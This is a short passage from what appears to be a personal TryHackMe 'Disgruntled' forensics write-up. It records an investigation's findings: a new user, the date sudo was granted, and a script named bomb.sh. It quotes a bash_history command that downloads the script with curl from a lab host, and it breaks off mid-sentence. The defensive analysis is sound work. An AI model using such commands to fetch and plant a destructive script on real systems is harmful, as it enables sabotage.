Zmschellinger/Zmschellinger.github.io/writeups/thm/disgruntled.md

 User created - it-admin
 Date sudo was given - Dec 28 06:27:34
 Script file name - bomb.sh
 ```
 To find more information on bomb.sh, I will be looking in the .bash_history file.
+The command used to created the file was curl 10.10.158.38:8080/bomb.sh --output bomb.sh. the file was then renamed and moved to